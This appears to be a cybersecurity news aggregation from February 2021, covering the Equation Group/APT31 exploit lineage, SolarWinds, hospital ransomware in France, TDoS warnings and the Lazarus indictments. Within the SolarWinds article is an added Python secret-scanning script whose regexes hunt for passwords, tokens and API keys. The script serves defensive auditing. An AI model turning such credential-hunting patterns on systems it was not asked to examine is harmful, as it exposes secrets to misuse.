“Together with additional artifacts that match Equation Group artifacts and habits shared between all exploits even as far back as 2008” concludes Check Point “we can safely conclude the following”:
Equation Group’s EpMe exploit, existing since at least 2013, is the original exploit for the vulnerability later labeled CVE-2017-0005.
Somewhere around 2014, APT31 managed to capture both the 32-bit and 64-bit samples of the EpMe Equation Group exploit.
They replicated them to construct “Jian”, and used this new version of the exploit alongside their unique multi-staged packer.
Jian was caught by Lockheed Martin’s IRT and reported to Microsoft, which patched the vulnerability in March 2017 and labeled it CVE-2017-0005.
South Carolina County Rebuilds Network After Hacking
23.2.2021 BigBrothers Securityweek
A South Carolina county continues to rebuild its computer network after what it called a sophisticated hacking attempt.
Hackers sent an email Jan. 22 that allowed them to take over Georgetown County’s computers. They demanded a ransom to return the system to the county’s control, spokeswoman Jackie Broach said.
The county did not pay the ransom and has been working for the past month to restore email and the network and clean infected computers, Broach said in a statement.
The cyber security experts hired by the county said there is no indication that tax, employment or other private information was obtained by the hackers, Broach said.
Email on county addresses is back up for about half of Georgetown County’s employees, with technology workers putting a priority on addresses used by the public, Broach said.
Authorities are investigating the breach and aren’t releasing information on the hackers.
The cyber security experts told the county the attack was sophisticated, getting into the system through “something most people would have mistaken for being a legitimate email,” Broach said.
Chinese Hackers Had Access to a U.S. Hacking Tool Years Before It Was Leaked Online
23.2.2021 BigBrothers Thehackernews
On August 13, 2016, a hacking unit calling itself "The Shadow Brokers" announced that it had stolen malware tools and exploits used by the Equation Group, a sophisticated threat actor believed to be affiliated to the Tailored Access Operations (TAO) unit of the U.S. National Security Agency (NSA).
Although the group has since signed off following the unprecedented disclosures, new "conclusive" evidence unearthed by Check Point Research shows that this was not an isolated incident, and that other threat actors may have had access to some of the same tools before they were published.
The previously undocumented cyber-theft took place more than two years prior to the Shadow Brokers episode, the American-Israeli cybersecurity company said in an exhaustive report published today, resulting in U.S.-developed cyber tools reaching the hands of a Chinese advanced persistent threat which then repurposed them in order to strike American targets.
"The caught-in-the-wild exploit of CVE-2017-0005, a zero-day attributed by Microsoft to the Chinese APT31 (aka Zirconium), is in fact a replica of an Equation Group exploit codenamed 'EpMe,'" Check Point researchers Eyal Itkin and Itay Cohen said. "APT31 had access to EpMe's files, both their 32-bits and 64-bits versions, more than two years before the Shadow Brokers leak."
The Equation Group, so-called by researchers from cybersecurity firm Kaspersky in February 2015, has been linked to a string of attacks affecting "tens of thousands of victims" as early as 2001, with some of the registered command-and-control servers dating back to 1996. Kaspersky called the group the "crown creator of cyberespionage."
An Unknown Privilege Escalation Exploit
First revealed in March 2017, CVE-2017-0005 is a security vulnerability in the Windows Win32k component that could potentially allow elevation of privileges (EoP) in systems running Windows XP and up to Windows 8. The flaw was reported to Microsoft by Lockheed Martin's Computer Incident Response Team.
Check Point has named the cloned variant "Jian" after a double-edged straight sword used in China during the last 2,500 years, referencing its origins as an attack tool developed by the Equation Group that was then weaponized to serve as a "double-edged sword" to attack U.S. entities.
Timeline of the events detailing the story of EpMe / Jian / CVE-2017-0005
Jian is said to have been replicated in 2014 and put in operation since at least 2015 until the underlying flaw was patched by Microsoft in 2017.
APT31, a state-sponsored hacking collective, is alleged to conduct reconnaissance operations at the behest of the Chinese Government, specializing in intellectual property theft and credential harvesting, with recent campaigns targeting U.S. election staff with spear-phishing emails containing links that would download a Python-based implant hosted on GitHub, allowing an attacker to upload and download files as well as execute arbitrary commands.
Stating that the DanderSpritz post-exploitation framework contained four different Windows EoP modules, two of which were zero-days at the time of its development in 2013, Check Point said one of the zero-days — dubbed "EpMo" — was silently patched by Microsoft "with no apparent CVE-ID" in May 2017 in response to the Shadow Brokers leak. EpMe was the other zero-day.
DanderSpritz was among the several exploit tools leaked by the Shadow Brokers on April 14, 2017, under a dispatch titled "Lost in Translation." The leak is best known for publishing the EternalBlue exploit that would later power the WannaCry and NotPetya ransomware infections that caused tens of billions of dollars' worth of damage in over 65 countries.
This is the first time a new Equation Group exploit has come to light despite EpMo's source code being publicly accessible on GitHub since the leak almost four years ago.
For its part, EpMo was deployed in machines running Windows 2000 to Windows Server 2008 R2 by exploiting a NULL-Deref vulnerability in Graphics Device Interface's (GDI) User Mode Print Driver (UMPD) component.
Jian and EpMe Overlap
"On top of our analysis of both the Equation Group and APT31 exploits, the EpMe exploit aligns perfectly with the details reported in Microsoft's blog on CVE-2017-0005," the researchers noted. "And if that wasn't enough, the exploit indeed stopped working after Microsoft's March 2017 patch, the patch that addressed the said vulnerability."
Apart from this overlap, both EpMe and Jian have been found to share an identical memory layout and the same hard-coded constants, supporting the conclusion that one of the exploits was most probably copied from the other, or that both parties were inspired by an unknown third party.
But so far, there are no clues alluding to the latter, the researchers said.
Interestingly, while EpMe didn't support Windows 2000, Check Point's analysis uncovered Jian to have "special cases" for the platform, raising the possibility that APT31 copied the exploit from the Equation Group at some point in 2014, before tweaking it to suit their needs and ultimately deploying the new version against targets, including possibly Lockheed Martin.
Reached for comment, a spokesperson for Lockheed Martin said "our cybersecurity team routinely evaluates third-party software and technologies to identify vulnerabilities and responsibly report them to developers and other interested parties."
Not the First Time
Check Point's findings are not the first time Chinese hackers have purportedly hijacked NSA's arsenal of exploits. In May 2019, Broadcom's Symantec reported that a Chinese hacking group called APT3 (or Buckeye) also had repurposed an NSA-linked backdoor to infiltrate telecom, media, and manufacturing sectors.
But unlike APT31, Symantec's analysis pointed out that the threat actor may have engineered its own version of the tools from artifacts found in captured network communications, potentially as a result of observing an Equation Group attack in action.
That Jian, a zero-day exploit previously attributed to APT31, is actually a cyber offensive tool created by the Equation Group for the same vulnerability signifies the importance of attribution for both strategic and tactical decision making.
"Even though 'Jian' was caught and analyzed by Microsoft at the beginning of 2017, and even though the Shadow Brokers leak exposed Equation Group's tools almost four years ago, there is still a lot one can learn from analyzing these past events," Cohen said.
"The mere fact that an entire exploitation module, containing four different exploits, was just lying around unnoticed for four years on GitHub, teaches us about the enormity of the leak around Equation Group tools."
FBI warns of the consequences of telephony denial-of-service (TDoS) attacks
22.2.2021 Attack BigBrothers Securityaffairs
The Federal Bureau of Investigation (FBI) has issued a warning about the risks of telephony denial-of-service (TDoS) attacks on call centers.
The United States’ Federal Bureau of Investigation (FBI) is warning of the consequences of telephony denial-of-service (TDoS) attacks on call centers, which in some cases could threaten people’s lives.
TDoS attacks can render telephone systems unavailable, making it impossible to make and receive calls, a frightening scenario when the attackers target 911 or other emergency call centers.
TDoS attacks can be manual or automated. Threat actors behind manual TDoS attacks use social networks to encourage large numbers of individuals to call a call center simultaneously, flooding it.
An automated TDoS attack leverages specific applications that allow attackers to make tens or hundreds of calls simultaneously; caller attributes can be easily spoofed, making it impossible to differentiate legitimate calls from malicious ones.
“A TDoS attack is an attempt to make a telephone system unavailable to the intended user(s) by preventing incoming and/or outgoing calls. The objective is to keep the distraction calls active for as long as possible to overwhelm the victim’s telephone system, which may delay or block legitimate calls for service. The resulting increase in time for emergency services to respond may have dire consequences, including loss of life.” reads the FBI’s public service announcement.
“TDoS attacks pose a genuine threat to public safety, especially if used in conjunction with a physical attack, by preventing callers from being able to request service. The public can protect themselves in the event that 911 is unavailable by identifying in advance non-emergency phone numbers and alternate ways to request emergency services in their area.”
The motivations behind these attacks are various, including hacktivism, financial gain through extortion, or harassment.
The FBI also provided a list of guidelines on how to prepare for a 911 outage:
Before there is an emergency, contact your local emergency services authorities for information on how to request service in the event of a 911 outage. Find out if text-to-911 is available in your area.
Have non-emergency contact numbers for fire, rescue, and law enforcement readily available in the event of a 911 outage.
Sign up for automated notifications from your locality if available to be informed of emergency situations in your area via text, phone call, or email.
Identify websites and follow social media for emergency responders in your area for awareness of emergency situations.
The US Government is going to respond to the SolarWinds hack very soon
21.2.2021 BigBrothers Securityaffairs
The US is going to respond to the SolarWinds supply chain attack within weeks, national security adviser Jake Sullivan told CNN.
The US will respond within weeks to the devastating SolarWinds supply chain attack, national security adviser Jake Sullivan told CNN.
“We are in the process now of working through, with the intelligence community and [President Joe Biden’s] national security team, a series of steps to respond to Solar Winds, including steps that will hold who we believe is responsible for this and accountable, and you will be hearing about this in short order,” Sullivan said. “We’re not talking about months from now, but weeks from now, that the United States will be prepared to take the first steps in response to solar winds.”
This week, White House cybersecurity officials announced that the investigation into the SolarWinds attack is likely to take “several months” at least.
Sullivan said the Biden administration is working to attribute the attack to a specific threat actor and properly respond to the offense.
“Right after President Biden took office, he tasked the intelligence community with an assessment of the scope and scale of this attack,” Sullivan said, speaking from the White House grounds. “And he also asked the intelligence community to provide him with an updated capacity to attribute exactly who conducted it. What the previous administration said was, quote, ‘that it was likely of Russian origin.’ We believe we can go further than that.”
Sullivan added that the response of the US government will not be limited to sanctions.
The national security adviser added that the US Government is working to harden its defenses to prevent a similar attack from happening again in the future.
“He added that there is also ‘intense work underway now to remediate this specific hack and ensure that the threat actor is expunged from federal government systems on a forward-going basis,’” states CNN.
Suspected Russian Hack Fuels New US Action on Cybersecurity
20.2.2021 BigBrothers Securityweek
Jolted by a sweeping hack that may have revealed government and corporate secrets to Russia, U.S. officials are scrambling to reinforce the nation’s cyber defenses and recognizing that an agency created two years ago to protect America’s networks and infrastructure lacks the money, tools and authority to counter such sophisticated threats.
The breach, which hijacked widely used software from Texas-based SolarWinds Inc., has exposed the profound vulnerability of civilian government networks and the limitations of efforts to detect threats.
It’s also likely to unleash a wave of spending on technology modernization and cybersecurity.
“It’s really highlighted the investments we need to make in cybersecurity to have the visibility to block these attacks in the future,” Anne Neuberger, the newly appointed deputy national security adviser for cyber and emergency technology said Wednesday at a White House briefing.
The reaction reflects the severity of a hack that was disclosed only in December. The hackers, as yet unidentified but described by officials as “likely Russian,” had unfettered access to the data and email of at least nine U.S. government agencies and about 100 private companies, with the full extent of the compromise still unknown. And while this incident appeared to be aimed at stealing information, it heightened fears that future hackers could damage critical infrastructure, like electrical grids or water systems.
President Joe Biden plans to release an executive order soon that Neuberger said will include about eight measures intended to address security gaps exposed by the hack. The administration has also proposed expanding by 30% the budget of the U.S. Cybersecurity and Infrastructure Agency, or CISA, a little-known entity now under intense scrutiny because of the SolarWinds breach.
Biden, making his first major international speech Friday to the Munich Security Conference, said that dealing with “Russian recklessness and hacking into computer networks in the United States and across Europe and the world has become critical to protecting our collective security.”
Republicans and Democrats in Congress have called for expanding the size and role of the agency, a component of the Department of Homeland Security. It was created in November 2018 amid a sense that U.S. adversaries were increasingly targeting civilian government and corporate networks as well as the “critical” infrastructure, such as the energy grid that is increasingly vulnerable in a wired world.
Speaking at a recent hearing on cybersecurity, Rep. John Katko, a Republican from New York, urged his colleagues to quickly “find a legislative vehicle to give CISA the resources it needs to fully respond and protect us.”
Biden’s COVID-19 relief package called for $690 million more for CISA, as well as providing the agency with $9 billion to modernize IT across the government in partnership with the General Services Administration.
That has been pulled from the latest version of the bill because some members didn’t see a connection to the pandemic. But Rep. Jim Langevin, co-chair of the Congressional Cybersecurity Caucus, said additional funding for CISA is likely to reemerge with bipartisan support in upcoming legislation, perhaps an infrastructure bill.
“Our cyber infrastructure is every bit as important as our roads and bridges,” Langevin, a Rhode Island Democrat, said in an interview. “It’s important to our economy. It’s important to protecting human life, and we need to make sure we have a modern and resilient cyber infrastructure.”
CISA operates a threat-detection system known as “Einstein” that was unable to detect the SolarWinds breach. Brandon Wales, CISA’s acting director, said that was because the breach was hidden in a legitimate software update from SolarWinds to its customers. Once the malicious activity had been identified, the system was able to scan federal networks and identify some government victims. “It was designed to work in concert with other security programs inside the agencies,” he said.
The former head of CISA, Christopher Krebs, told the House Homeland Security Committee this month that the U.S. should increase support to the agency, in part so it can issue grants to state and local governments to improve their cybersecurity and accelerate IT modernization across the federal government, which is part of the Biden proposal.
“Are we going to stop every attack? No. But we can take care of the most common risks and make the bad guys work that much harder and limit their success,” said Krebs, who was ousted by then-President Donald Trump after the election and now co-owns a consulting company whose clients include SolarWinds.
The breach was discovered in early December by the private security firm FireEye, a cause of concern for some officials.
“It was pretty alarming that we found out about it through a private company as opposed to our being able to detect it ourselves to begin with,” Avril Haines, the director of national intelligence, said at her January confirmation hearing.
Right after the hack was announced, the Treasury Department bypassed its normal competitive contracting process to hire the private security firm CrowdStrike, U.S. contract records show. The department declined to comment. Sen. Ron Wyden, D-Ore., has said that dozens of email accounts of top officials at the agency were hacked.
The Social Security Administration hired FireEye to do an independent forensic analysis of its network logs. The agency had a “backdoor code” installed like other SolarWinds customers, but “there were no indicators suggesting we were targeted or that a future attack occurred beyond the initial software installation,” spokesperson Mark Hinkle said.
Sen. Mark Warner, a Virginia Democrat who chairs the Senate Intelligence Committee, said the hack has highlighted several failures at the federal level but not necessarily a lack of expertise by public sector employees. Still, “I doubt we will ever have all the capacity we’d need in-house,” he said.
There have been some new cybersecurity measures taken in recent months. In the defense policy bill that passed in January, lawmakers created a national director of cybersecurity, replacing a position at the White House that had been cut under Trump, and granted CISA the power to issue administrative subpoenas as part of its efforts to identify vulnerable systems and notify operators.
The legislation also granted CISA increased authority to hunt for threats across the networks of civilian government agencies, something Langevin said they were only previously able to do when invited.
“In practical terms, what that meant is they weren’t invited in because no department or agency wants to look bad,” he said. “So you know what was happening? Everyone was sticking their heads in the sand and hoping that cyberthreats were going to go away.”
Brussels Okays EU-UK Personal Data Flows
20.2.2021 BigBrothers Securityweek
The European Commission lifted the threat of crucial data flows between Europe and Britain being blocked in a move that would have crippled business activity as it said Friday that privacy safeguards in the UK met European standards.
In a key post-Brexit decision, the EU executive said that British authorities had sufficient measures in place to protect European users' personal data, freeing up data transfers for businesses as well as for police.
The adequacy decision, to be formally adopted by the 27 member states, would ensure that data protection will "never be compromised when personal data travel across the Channel," said EU Justice Commissioner Didier Reynders.
Businesses will breathe a sigh of relief at the decision, with more and more companies relying on cross-border cloud computing and other technology to function every day.
This was made especially clear during the Covid-19 pandemic as companies, schools and governments increasingly went online, counting on big tech's networks to operate.
A negative decision would have blocked the transfer of data from EU-based companies to the UK, crippling activity.
- Sensitive issue -
Britain is seeking similar adequacy decisions for its financial services, but this is proving far more contentious, with Brussels giving no clear indication of when a decision will be made.
The EU currently has data adequacy agreements with 12 countries, including Japan, Switzerland and Canada, and negotiations are underway with South Korea.
Once approved, personal data transferred to Britain will be treated as if it were moving within the EU.
Oliver Dowden, Britain's Secretary of State for Digital, said he welcomed the move "although the EU’s progress in this area has been slower than we would have wished."
"I am glad we have now reached this significant milestone following months of constructive talks in which we have set out our robust data protection framework," he added.
The security of personal data has become a sensitive issue, with the EU's top court having struck down a similar arrangement between the EU and the United States.
The European Court of Justice has decided on several occasions that national security laws in the United States violate European privacy standards, making that deal illegal.
For the UK, the commission assessed that country's Investigatory Powers Act of 2016, which contains extensive powers including the ability to carry out bulk data surveillance.
The EU, however, found those powers were satisfactorily controlled by UK law and by Britain's adherence to the European Convention on Human Rights.
The Business Software Alliance, a lobby group for big tech companies including Microsoft, Oracle and IBM said it was "delighted" by the decision.
"This will provide long-term confidence that data will continue to flow between the two partners post-Brexit," said BSA's Thomas Boue, policy chief for Europe.
Max Schrems, an Austrian lawyer and activist who led the fight against the EU's data arrangements with the US, tweeted that there were issues with the UK proposal on security that will require "deep analysis".
SolarWinds Hackers Stole Some Source Code for Microsoft Azure, Exchange, Intune
20.2.2021 BigBrothers Thehackernews
Microsoft on Thursday said it concluded its probe into the SolarWinds hack, finding that the attackers stole some source code but confirmed there's no evidence that they abused its internal systems to target other companies or gained access to production services or customer data.
The disclosure builds upon an earlier update on December 31, 2020, that uncovered a compromise of its own network to view source code related to its products and services.
"We detected unusual activity with a small number of internal accounts and upon review, we discovered one account had been used to view source code in a number of source code repositories," the Windows maker had previously disclosed.
"The account did not have permissions to modify any code or engineering systems and our investigation further confirmed no changes were made. These accounts were investigated and remediated."
Now, according to the company, besides viewing a few individual files by searching through the repositories, some cases involved downloading component source code related to —
a small subset of Azure components (subsets of service, security, identity)
a small subset of Intune components
a small subset of Exchange components
"The search terms used by the actor indicate the expected focus on attempting to find secrets," the company said, adding a subsequent verification affirmed the fact that they did not contain any live, production credentials.
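The passage above makes two points a defender can act on: the intruder's repository searches were aimed at secrets, and Microsoft's follow-up check was that the viewed code contained no live production credentials. The block below is an added example of that check, not Microsoft's tooling and not code from the article: a small scan that flags literal values assigned to credential-like names, skips values that only reference the environment or a template, and uses a Shannon-entropy threshold (3.5 bits per character, an assumption) to separate random-looking keys from ordinary passwords. The file paths and contents are constructed for the example.

```python
"""Scan source text for literal credentials.

Added illustration of the "did the repository contain live secrets" check;
the sample files, regexes and threshold below are assumptions for the example.
"""
import math
import re
from typing import Dict, List

# Constructed sample repository contents (hypothetical paths and values).
SAMPLE_FILES: Dict[str, str] = {
    "config/dev.py": 'API_URL = "https://example.invalid/api"\nTIMEOUT = 30\n',
    "deploy/prod.env": "AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\n",
    "auth/client.py": 'password = "hunter2"\nclient_secret = os.environ["CLIENT_SECRET"]\n',
    "README.md": "Set CLIENT_SECRET in your environment before running.\n",
}

# An assignment whose left-hand name contains a credential keyword,
# e.g. `password = "..."`, `SECRET_KEY: ...`, `api_key=...`.
CREDENTIAL_RE = re.compile(
    r'(?i)(password|passwd|secret|token|api[_-]?key)[\w-]*\s*[=:]\s*["\']?([^"\'\s]+)'
)

# Lines that pull the value from the environment or leave a placeholder
# are not live secrets and are skipped.
INDIRECTION_RE = re.compile(r"os\.environ|getenv\(|\$\{?[A-Z_][A-Z0-9_]*\}?|<[^>]+>")

ENTROPY_THRESHOLD = 3.5  # bits per character; random keys score well above this


def shannon_entropy(value: str) -> float:
    """Shannon entropy of a string in bits per character (0.0 for empty input)."""
    if not value:
        return 0.0
    counts: Dict[str, int] = {}
    for ch in value:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(value)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def scan_text(path: str, text: str) -> List[dict]:
    """Return one finding per line that assigns a literal to a credential-like name."""
    findings: List[dict] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        match = CREDENTIAL_RE.search(line)
        if match is None:
            continue
        if INDIRECTION_RE.search(line):
            continue  # environment lookup or template placeholder, not a literal
        name, value = match.group(1), match.group(2)
        entropy = shannon_entropy(value)
        findings.append(
            {
                "path": path,
                "line": lineno,
                "name": name,
                # high-entropy: looks like a generated key; keyword: a plain password
                "kind": "high-entropy" if entropy >= ENTROPY_THRESHOLD else "keyword",
                "entropy": round(entropy, 2),
                # never echo the whole value into logs or a report
                "preview": (value[:4] + "...") if len(value) > 4 else value,
            }
        )
    return findings


def scan_files(files: Dict[str, str]) -> List[dict]:
    """Scan a mapping of path -> file contents and collect all findings."""
    results: List[dict] = []
    for path, text in files.items():
        results.extend(scan_text(path, text))
    return results


if __name__ == "__main__":
    for finding in scan_files(SAMPLE_FILES):
        print(
            f"{finding['path']}:{finding['line']} {finding['kind']:<12} "
            f"{finding['name']} = {finding['preview']} (entropy {finding['entropy']})"
        )
```

Run against a checkout, this reports the `.env` key as high-entropy and the hard-coded password as a keyword hit, while the README mention and the `os.environ` lookup produce nothing. A real deployment would add provider-specific patterns and, for each hit, a liveness check against the issuing service, which is the step that turns "a secret-looking string was viewed" into "a credential must be rotated".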
Calling the SolarWinds supply chain attack a "moment of reckoning," Microsoft in January recommended that organizations adopt a "zero trust mentality," enforcing least-privilege access and enabling multi-factor authentication to minimize risk.
The company said the attacks have reinforced the need to embrace the Zero Trust mindset and protect privileged credentials.
It's worth noting that the entire espionage campaign leveraged the trust associated with SolarWinds software to insert malicious code that was then distributed to as many as 18,000 of its customers.
"Zero Trust is a proactive mindset," said Vasu Jakkal, corporate vice president for security, compliance, and identity at Microsoft. "When every employee at a company assumes attackers are going to land at some point, they model threats and implement mitigations to ensure that any potential exploit can't expand."
"The value of defense-in-depth is that security is built into key areas an actor might try to break, beginning at the code level and extending to all systems in an end-to-end way."
France to Boost Cyberdefense After Hospital Malware Attacks
19.2.2021 BigBrothers Securityweek
French President Emmanuel Macron on Thursday unveiled a plan to better arm public facilities and private companies against cybercriminals following ransomware attacks at two hospitals this month and an upsurge of similar cyber assaults in France.
The attacks at the hospitals in Dax and Villefranche-sur-Saone prompted the transfer of some patients to other facilities as the French health care system is under pressure from the coronavirus pandemic.
Macron discussed the attacks with officials and workers from both hospitals, saying the incident “shows how the threat is very serious, sometimes vital.”
“We are learning about these new attacks, some coming from states as part of new conflicts between nations, others coming from mafias,” the French leader said during a videoconference. Some attacks have “criminal” or “lucrative” motives, others are used to “destabilize” countries, he added.
Macron referred to a massive hack of U.S. federal agencies last year and to the theft of vaccine documents from the European Medicines Agency in November.
He stressed the need for international cooperation among police and criminal justice agencies after Ukrainian authorities confirmed a ransomware program known as Egregor was dismantled in the country earlier this month following a joint action by the United States, France and Ukraine.
Macron’s office said the government will earmark about 500 million euros ($603 million) to help boost cyberdefense systems in the public and private sector.
The National Cybersecurity Agency of France (ANSSI) reported that ransomware attacks surged 255% in 2020 compared to the previous year. All sectors and geographical areas of the country were included, but the increase particularly concerns the health care sector, the education system, local authorities and digital service providers, ANSSI said.
In a ransomware attack, criminals infect computers or computer systems with malware that encrypts data and locks the targeted users out until they pay a ransom.
The hospital in Villefranche-sur-Saone, located north of the city of Lyon, said its phone system went down during a cyberattack on Monday that forced a preemptive shutoff of the internet service and other networks to keep the ransomware from spreading.
The hospital also had to postpone surgeries planned for the following day, but said patient safety was preserved.
The Dax hospital in southwestern France reported a similar attack last week. Without phones and computers working, health care workers had to use pen and paper for record keeping.
The French cybersecurity agency is helping to investigate the attacks.
ANSSI said Monday that an attack similar to ones used by Russian hackers targeted software distributed by the French company Centreon, resulting in the breach of “several French entities” from late 2017 to 2020.
“This campaign bears several similarities with previous campaigns attributed to the intrusion set named Sandworm,” ANSSI said in a statement Monday.
Sandworm is a Russian military hacking group that U.S. security officials and cybersecurity experts said interfered in the 2016 presidential election in the United States, stealing and exposing Democratic National Committee emails and breaking into voter registration databases.
The group has also been blamed by the U.S. and U.K. governments for the June 2017 NotPetya cyberattack, which targeted businesses that operate in Ukraine. It caused at least $10 billion in damage globally, most notably to the Danish shipping multinational Maersk.
Hackers Target Myanmar Government Websites in Coup Protest
19.2.2021 BigBrothers Securityweek
Hackers attacked military-run government websites in Myanmar Thursday as a cyber war erupted after authorities shut down the internet for a fourth straight night.
A group called Myanmar Hackers disrupted multiple government websites, including those of the Central Bank, the Myanmar military's propaganda page, state-run broadcaster MRTV, the Port Authority and the Food and Drug Administration.
The move comes a day after thousands of people rallied across the country to protest against a military coup that toppled Aung San Suu Kyi's civilian government from power earlier this month.
"We are fighting for justice in Myanmar," the hacking group said on its Facebook page.
"It is like mass protesting of people in front of government websites."
Cybersecurity expert Matt Warren from Australia's RMIT University said it was likely the aim of the hacking was to generate publicity.
"The sorts of attacks they would be undertaking are denial of service attacks or defacing websites, which is called hacktivism," he told AFP.
"The impact will be potentially limited but what they are doing is raising awareness."
Another internet shutdown began in Myanmar at about 1:00 am on Thursday (1830 GMT Wednesday), according to NetBlocks, a Britain-based group that monitors internet outages around the world.
It said internet connectivity had dropped to just 21 percent of ordinary levels.
US Still Unraveling ‘Sophisticated’ Hack of 9 Gov’t Agencies
18.2.2021 BigBrothers Securityweek
U.S. authorities are still working to unravel the full scope of the likely Russian hack that gave the “sophisticated” actor behind the breach complete access to files and email from at least nine government agencies and about 100 private companies, the top White House cybersecurity official said Wednesday.
Anne Neuberger, the newly appointed deputy national security adviser for cyber and emerging technology, also warned that the danger has not passed because the hackers breached networks of technology companies whose products could be used to launch additional intrusions.
A task force is investigating the extent of the damage from the breach, assessing potential responses and trying to confirm the identity of whoever was behind it — a process Neuberger warned will take more time.
“This is a sophisticated actor who did their best to hide their tracks,” she told reporters at the White House. “We believe it took them months to plan and execute this compromise. It will take us some time to uncover this layer by layer.”
U.S. authorities have said the breach, disclosed in December, appeared to be the work of Russian hackers. Neuberger, a former senior official at the National Security Agency who was appointed by President Joe Biden this month, went no further.
“An advanced, persistent threat actor likely of Russian origin was responsible,” she said, without providing any further details and sounding a cryptic note on potential responses.
“This isn’t the only case of malicious cyber activity of likely Russian origin, either for us or for our allies and partners,” Neuberger added. “So, as we contemplate future response options, we are considering holistically what those activities were.”
The Russian government has denied involvement.
Private security company FireEye was first to identify the breach, revealing that hackers hijacked widely used network software from SolarWinds Inc. to install malicious software through what appeared to be a routine software update.
Intelligence agencies did not detect the breach because they largely have “no visibility into private-sector networks,” and it was launched within the U.S., Neuberger said. The Biden administration supports changes to “culture and authorities” that prevented the hack from being detected on the federal civilian systems, she added.
The hack, Neuberger said, highlights the need to modernize the nation’s IT infrastructure and its cyber defenses, issues that will be addressed in an upcoming executive order from Biden aimed at addressing security and technology gaps highlighted by the breach.
Several agencies have acknowledged that they were breached, including the Treasury Department and Justice Department, but the full list has not been publicly released. Once inside, the hackers had full access to the victims’ data.
“The techniques that were used lead us to believe that any files or emails on a compromised network were likely to be compromised,” Neuberger said.
Some members of Congress have criticized the response based on what they have been told so far, all in private. “The briefings we have received convey a disjointed and disorganized response to confronting the breach,” Sen. Mark Warner, a Democrat from Virginia, and Sen. Marco Rubio, Republican from Florida, said in a recent letter to the White House.
Neuberger said she intended to return to the Capitol to brief lawmakers in the coming days.
U.S. Charges North Korean Hackers Over $1.3 Billion Bank Heists
18.2.2021 BigBrothers Securityweek
Three North Korean Military Hackers Indicted in Wide-Ranging Scheme to Commit Cyberattacks and Financial Crimes Across the Globe
The U.S. Justice Department on Wednesday announced the indictment of three North Korean military intelligence officials linked to high-profile cyber-attacks that included the theft of $1.3 billion in money and crypto-currency from organizations around the world.
The indictment alleges the trio was part of a “wide-ranging criminal conspiracy to conduct a series of destructive cyberattacks” against companies and crypto-currency exchanges around the world.
The DOJ described the scope of the North Korean hacking operation as “extensive and long-running”.
“The range of crimes they committed is staggering,'' said Acting U.S. Attorney Tracy Wilkison. “The conduct detailed in the indictment are the acts of a criminal nation-state that has stopped at nothing to extract revenge and obtain money to prop up its regime.”
The new indictment expands on a 2018 case against the Pyongyang hacking group blamed for attacks against Sony Pictures, the destructive WannaCry worm, a series of brazen online bank robberies against the global financial system, and ongoing ransomware extortion schemes.
The group, known publicly as Lazarus, has also been actively draining billions of dollars from hacks against crypto-currency exchanges.
The newest indictment adds two new North Korean defendants to the government’s case, and the department also named a Canadian-American citizen who took part in the Lazarus group’s money laundering operations.
From the Justice Department announcement:
The hacking indictment filed in the U.S. District Court in Los Angeles alleges that Jon Chang Hyok (전창혁), 31; Kim Il (김일), 27; and Park Jin Hyok (박진혁), 36, were members of units of the Reconnaissance General Bureau (RGB), a military intelligence agency of the Democratic People’s Republic of Korea (DPRK), which engaged in criminal hacking. These North Korean military hacking units are known by multiple names in the cybersecurity community, including Lazarus Group and Advanced Persistent Threat 38 (APT38). Park was previously charged in a criminal complaint unsealed in September 2018.
The indictment blames the Lazarus group hackers for a wide range of publicly documented attacks, including the hack of Sony Pictures Entertainment in November 2014, the targeting of AMC Theatres later that year, and a 2015 intrusion into Mammoth Screen, which was producing a fictional series involving a British nuclear scientist taken prisoner in DPRK.
The U.S. government also linked the indicted hackers to billion-dollar bank heists that attacked the SWIFT (Society for Worldwide Interbank Financial Telecommunication) messaging system. The group is also charged with ATM cash-out schemes that stole $6.1 million from a Pakistan bank.
The government also detailed the group’s involvement in the WannaCry ransomware and the development and deployment of multiple malicious cryptocurrency applications that gave the North Korean hackers a backdoor into victims’ computers.
The Lazarus group has recently been flagged targeting security researchers involved in anti-malware research and other offensive exploit development work.
Earlier this week it was reported that North Korean hackers tried to hack into pharmaceutical giant Pfizer in a search for information on a coronavirus vaccine and treatment technology, adding to previous activity associated with the rogue nation trying to access COVID-19 related research.
In July 2017, researchers from Recorded Future analyzed internet traffic from North Korea. One of their conclusions was that "most state-sponsored activity is perpetrated from abroad." Recorded Future suggested at the time that North Korean malicious activity most likely originates from countries such as India, Malaysia, New Zealand, Nepal, Kenya, Mozambique, and Indonesia.
In late September 2017, the United States Cyber Command reportedly engaged in offensive activity against North Korea, by launching a DDoS attack against its military spy agency, the Reconnaissance General Bureau (RGB). The attack occurred just five weeks after President Trump elevated U.S. Cyber Command to a Unified Combatant Command.
CISO Conversations: Princeton, Cal State and Ohio State CISOs Talk Higher Ed Cybersecurity
18.2.2021 BigBrothers Securityweek
CISO Conversations: Princeton, Cal State and Ohio State Security Chiefs Discuss Their Roles in the Higher Education Sector
The higher education sector is like no other vertical among the critical industries. Each institution resembles a municipality, comprising retail, healthcare, physical security, fire station and police force – and perhaps 10,000 new potential student hackers every year.
It requires a special quality of CISO, and in this installment of SecurityWeek's CISO Conversations series, we talk to three of the best: David Sherry (Princeton University), Ed Hudson (California State University) and Helen Patton (Ohio State University).
Personal attributes
So, what does it take to be a CISO in higher education? David Sherry has two suggestions. The first is the ability to understand the culture of your organization. This will vary across sectors and between companies.
“Our mission statement,” he explained, “is to make security programmatic and cultural. And you cannot do that without understanding the culture that you’re in. I could not do my job at Princeton with the mindset of working at a top ten bank. They’re not the same. If I tried to utilize the same methodology and vision of the banking industry in higher ed, well, I’d be tarred and feathered on the main green pretty quickly. So, understanding that culture is first.”
The second, he added, is coolness under pressure – you cannot be a leader if you panic. “People like to see someone who takes command in a pressured situation, whether it’s 48 hours to flip your model from on-campus to off-campus in response to COVID-19, or an attack coming from a nation-state or whatever.”
Helen Patton’s suggestion possibly encompasses these – and much more – in two simple words: a CISO needs ‘emotional intelligence’.
Recruitment and diversity
Staff recruitment and diversity are issues that are closely related and important to all CISOs. Recruitment is made difficult because of the huge skills gap in cybersecurity, while increased diversity – in this instance focused on increasing the number of women engineers – is seen as a method of closing that gap. But the advantages of diversity go beyond just adding numbers to the potential labor pool.
